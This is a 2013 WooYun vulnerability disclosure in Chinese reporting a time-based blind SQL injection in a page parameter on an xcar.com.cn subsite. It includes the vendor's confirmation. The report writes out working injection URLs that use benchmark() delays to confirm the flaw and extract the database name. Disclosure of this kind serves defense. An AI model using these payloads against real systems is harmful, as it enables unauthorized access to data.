爱卡汽车网某分站sql盲注一枚 | wooyun-2013-041709

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-041709

漏洞标题：

爱卡汽车网某分站sql盲注一枚

漏洞详情

披露状态：

2013-11-08：细节已通知厂商并且等待厂商处理中
2013-11-11：厂商已经确认，细节仅向厂商公开
2013-11-21：细节向核心白帽子及相关领域专家公开
2013-12-01：细节向普通白帽子公开
2013-12-11：细节向实习白帽子公开
2013-12-23：细节向公众公开

简要描述：

妈妈说以后只给送礼物的厂商找漏洞。

详细说明：

猪肉点：
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908
and 8=8 和and 8=88 显示的页面一样。
但是我测试这个才发现语句是执行了。
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 and 8=8 and benchmark(5000000,md5(0x41))

执行这句时，看上图，浏览器在那打转了5秒钟。
但是执行这个
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 and 8=88 and benchmark(5000000,md5(0x41))
刷一下 1秒就过去了。
说明SQL语句执行了。
这样的话就可以用时间延迟来注出数据库的信息了。
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 and length(database())=7 and benchmark(5000000,md5(0x41))
得到数据库长度为7
http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908%20and%20database%28%29=0x78636172646232%20and%20benchmark%285000000,md5%280x41%29%29
得到数据库名为：xcardb2
等等。

漏洞证明：

修复方案：

妈妈说以后只给送礼物的厂商找漏洞。
我在这提醒你们一下
http://wooyun.org/bugs/wooyun-2013-036993
这个洞你还没补呢,一并补了吧。

版权声明：转载请注明来源 sql@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2013-11-11 10:08

厂商回复：

感谢白帽子@sql的提供，漏洞已经确认，我们会抓紧时间修复！谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sql@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sql@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞